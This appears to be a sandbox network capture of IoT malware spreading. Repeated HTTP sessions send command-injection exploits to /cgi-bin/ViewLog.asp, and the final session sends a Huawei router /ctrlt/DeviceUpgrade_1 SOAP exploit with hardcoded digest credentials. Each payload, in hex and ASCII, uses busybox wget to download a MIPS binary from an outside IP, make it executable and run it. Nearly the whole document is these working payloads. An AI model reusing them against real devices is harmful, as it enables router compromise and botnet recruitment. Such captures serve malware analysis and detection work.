                                              Nov 23, 2023 05:17:44.320636034 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:44.937927961 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.133620024 CET552INHTTP/1.1 400 Bad Request
                                              Date: Thu, 23 Nov 2023 04:17:45 GMT
                                              Server: Apache/2.4.10 (Debian)
                                              Content-Length: 304
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 31 30 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.10 (Debian) Server at 192.168.0.14 Port 80</address></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              522192.168.2.133521262.29.43.258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:44.359168053 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.542270899 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:46.918251038 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.862267971 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:55.494211912 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.502207994 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              523192.168.2.135836494.121.124.2058080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:44.686559916 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              524192.168.2.135868294.121.148.2118080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:44.747831106 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              525192.168.2.134535094.120.211.2348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:44.747862101 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              526192.168.2.135183895.86.112.1518080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:44.750519037 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              527192.168.2.134093231.136.140.228080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:44.873069048 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.446299076 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:46.598256111 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:49.094243050 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:53.702243090 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.918205976 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:22.374341965 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              528192.168.2.134150094.253.16.1678080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:44.915709019 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:45.146338940 CET391INHTTP/1.1 405 Not Allowed
                                              Server: Web server
                                              Date: Thu, 23 Nov 2023 04:17:42 GMT
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 155
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              529192.168.2.133682895.86.89.208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:44.985718966 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              530192.168.2.1350080156.230.18.10237215
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:17:45.891081095 CET874OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Content-Length: 430
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 37 34 2e 35 30 2e 38 34 2e 32 30 33 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 77 65 62 6f 73 2f 77 68 6f 61 72 65 79 6f 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
